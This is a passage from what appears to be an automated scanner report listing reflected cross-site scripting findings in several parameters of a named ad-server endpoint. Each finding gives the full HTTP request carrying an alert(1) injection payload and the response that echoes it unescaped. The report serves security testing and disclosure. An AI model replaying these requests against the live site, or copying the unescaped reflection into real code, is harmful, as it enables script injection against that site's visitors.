Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:19 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MTA5JnZ0PTE=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:19 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=6245678"-alert(1)-"fd7002ae68b&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck="; var base_url = "http:
...[SNIP]...

3.19. http://delivery.steelhousemedia.com/serve [guid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the guid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c7d"-alert(1)-"4e1f30b2d89 was submitted in the guid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64bebb9c7d"-alert(1)-"4e1f30b2d89&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: guid=d1fa0916-170c-4ed4-ba0c-ad47d55475b4;Path=/;Domain=.steelhousemedia.com;Expires=Tue, 11-Jul-2079 16:59:24 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:17 GMT;Max-Age=31536000
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:17 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64bebb9c7d"-alert(1)-"4e1f30b2d89&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&c
...[SNIP]...

3.20. http://delivery.steelhousemedia.com/serve [ms parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the ms request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25cb3"-alert(1)-"d0283203973 was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=125cb3"-alert(1)-"d0283203973&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:28 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:28 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=125cb3"-alert(1)-"d0283203973&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC
...[SNIP]...

3.21. http://delivery.steelhousemedia.com/serve [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96eff"-alert(1)-"7e8c56accdd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=&96eff"-alert(1)-"7e8c56accdd=1 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:47 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:47 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
vid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck=&96eff"-alert(1)-"7e8c56accdd=1"; var base_url = "http://rtb.steelhousemedia.com/capsNotify?aid=9297&cid=906&pp=2.25&guid=d09b7564-e06a-439f-88f1-23754bc64beb"; var secure_url = "https://rtb.steelhousemedia.com/capsNotify?aid=9297
...[SNIP]...

3.22. http://delivery.steelhousemedia.com/serve [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3c9"-alert(1)-"ed0f7d313c7 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25fa3c9"-alert(1)-"ed0f7d313c7&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:30 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:30 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
iginalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25fa3c9"-alert(1)-"ed0f7d313c7&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck="; var base_url = "http://rtb.st
...[SNIP]...

3.23. http://delivery.steelhousemedia.com/serve [segid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the segid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa7e9"-alert(1)-"f50190ea30d was submitted in the segid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0aa7e9"-alert(1)-"f50190ea30d&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjI=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 22-Jun-2012 13:45:20 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Sun, 20-Jun-2021 13:45:20 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0aa7e9"-alert(1)-"f50190ea30d&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1s&tp=457598401&ck="; var base_url =
...[SNIP]...

3.24. http://delivery.steelhousemedia.com/serve [sh_ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://delivery.steelhousemedia.com
Path:	/serve

Issue detail

The value of the sh_ref request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c47e5"-alert(1)-"5212b298428 was submitted in the sh_ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /serve?cb=457598401&sh_rid=adserver005:937789&ms=1&aid=6007&cgid=1850&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=62&pp=2.25&sh_ref=aHR0cDovL2libmxpdmUuaW4uY29tL2dlbmVyYWxuZXdzZmVlZC9uZXdzL2ZpbmFuY2lhbC1maXJtcy1yZXF1aXJlZC10by1iZWVmLXVwLWNvbXB1dGVyLXNlY3VyaXR5LzczNTM1Ni5odG1sc47e5"-alert(1)-"5212b298428&tp=457598401&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
Referer: http://ibnlive.in.com/generalnewsfeed/news/financial-firms-required-to-beef-up-computer-security/735356.html
